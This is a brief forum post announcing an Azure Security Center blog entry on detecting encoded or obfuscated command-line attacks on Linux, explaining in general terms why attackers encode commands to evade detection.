Forum Discussion

EricStarker's avatar
EricStarker
Former Employee
Jun 06, 2018

Detecting script-based attacks on Linux

Last month, we announced the extension of Azure Security Center’s detection for Linux. This post aims to demonstrate how existing Windows detections often have Linux analogs. A specific example of this is the encoding or obfuscation of command-lines.

 

Some of the reasons an attacker might wish to encode their commands include minimizing quoting/escaping issues when encapsulating commands in scripts and a basic means of hiding from host-based intrusion detection. These techniques have the additional benefit of avoiding the need to drop a file to disk, reducing the risk to an attacker of being detected by traditional anti-virus products.

 

 

Read about it in the Azure blog.

No RepliesBe the first to reply

Resources